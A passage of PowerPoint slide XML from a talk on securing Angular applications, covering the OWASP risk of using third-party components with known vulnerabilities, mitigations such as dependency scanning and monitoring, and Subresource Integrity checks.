              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Apache Strust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>(2.3.x &lt; 2.3.34 and 2.5.x &lt; 2.5.13) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Equifax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>breach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6768752" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3rd party components with known vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166731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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3888432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>How Do I Prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>'Using Components with Known Vulnerabilities'?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3" tooltip="OWASP Dependency Check"/>
              </a:rPr>
              <a:t>DependencyCheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Dependency-Track</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Continuously monitor sources like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>NVD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> for vulnerabilities in your components. Use software composition analysis tools to automate the process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Analyze libraries to be sure they are actually invoked at runtime before making changes, as the majority of components are never loaded or invoked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Decide whether to upgrade component (and rewrite application to match if needed) or deploy a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" u="sng" dirty="0">
                <a:hlinkClick r:id="rId7" tooltip="Virtual Patching Best Practices"/>
              </a:rPr>
              <a:t>virtual patch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> that analyzes HTTP traffic, data flow, or code execution and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>prevents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>vulnerabilities from being exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Top_10_2017-A9-Using_Components_with_Known_Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6768752" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A9 Mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317236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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Checking JavaScript libraries integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>-party providers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>requires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> a lot of trust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>What if the provider gets compromised ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>What if the provider decides to change the code </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>you are including ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Subresource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> integrity (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>SRI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>SRI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>calculates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>verifies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> the checksum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>resources</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>provided</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> by online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> / by CDN / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>webpack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> plugin in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>process</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Supported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> by Chrome, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Opera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>backward</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> compatible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="è"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6768752" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A9 Mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:b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995686"/>
            <a:ext cx="4306615" cy="1235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73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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Detecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>known vulnerable JavaScript libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
